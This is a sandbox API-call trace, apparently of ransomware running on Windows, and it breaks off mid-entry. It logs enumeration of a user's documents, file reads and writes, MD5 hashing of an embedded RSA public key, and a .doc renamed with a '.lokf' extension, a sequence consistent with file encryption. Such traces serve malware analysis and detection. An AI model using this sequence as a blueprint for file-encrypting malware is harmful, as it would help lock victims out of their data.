[0059.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0059.599] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.599] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.599] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.599] CloseHandle (hObject=0x5cc) returned 1 [0059.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.600] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\nqPYpTIV1l.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\nqpyptiv1l.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\nqPYpTIV1l.doc.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\nqpyptiv1l.doc.lokf")) returned 1 [0059.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.601] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201e90 | out: hHeap=0x660000) returned 1 [0059.602] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b33ed90, ftCreationTime.dwHighDateTime=0x1d4d2f4, ftLastAccessTime.dwLowDateTime=0xb4c43010, ftLastAccessTime.dwHighDateTime=0x1d4c906, ftLastWriteTime.dwLowDateTime=0xb4c43010, ftLastWriteTime.dwHighDateTime=0x1d4c906, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pW62l8V1WmQv", cAlternateFileName="PW62L8~1")) returned 1 [0059.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0059.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adbb0 [0059.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0059.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.602] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a225a30, ftCreationTime.dwHighDateTime=0x1d4c844, ftLastAccessTime.dwLowDateTime=0x6b59fcd0, ftLastAccessTime.dwHighDateTime=0x1d4d3c3, ftLastWriteTime.dwLowDateTime=0x6b59fcd0, ftLastWriteTime.dwHighDateTime=0x1d4d3c3, nFileSizeHigh=0x0, nFileSizeLow=0x15b11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qsrLr5Sl.csv", cAlternateFileName="")) returned 1 [0059.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201e90 [0059.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.602] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\qsrLr5Sl.csv") returned=".csv" [0059.602] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\qsrLr5Sl.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\qsrlr5sl.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.602] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=88849) returned 1 [0059.602] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.605] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15aeb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.605] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.605] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.605] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.605] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.606] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x15b11, lpOverlapped=0x0) returned 1 [0059.606] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.606] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.606] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.606] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.606] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.607] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.607] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.607] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.607] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.607] GetLastError () returned 0x0 [0059.607] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.607] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.607] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.607] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.607] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.607] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.607] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x15b10) returned 0x9c88ae8 [0059.608] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87f80 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87fc8 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6d0 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6e8 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85728 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85740 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.608] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6e8 | out: hHeap=0x660000) returned 1 [0059.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85740 | out: hHeap=0x660000) returned 1 [0059.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85728 | out: hHeap=0x660000) returned 1 [0059.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6e8 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85728 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85740 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85728 | out: hHeap=0x660000) returned 1 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85740 | out: hHeap=0x660000) returned 1 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6e8 | out: hHeap=0x660000) returned 1 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.609] GetCurrentThreadId () returned 0x9e0 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c83f98 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.609] GetCurrentThreadId () returned 0x9e0 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.609] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6e8 [0059.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85728 [0059.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85740 [0059.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85758 [0059.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0059.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85788 [0059.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857a0 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85788 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85788 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857a0 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85728 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85728 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6e8 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85788 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85728 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85740 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87fc8 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: 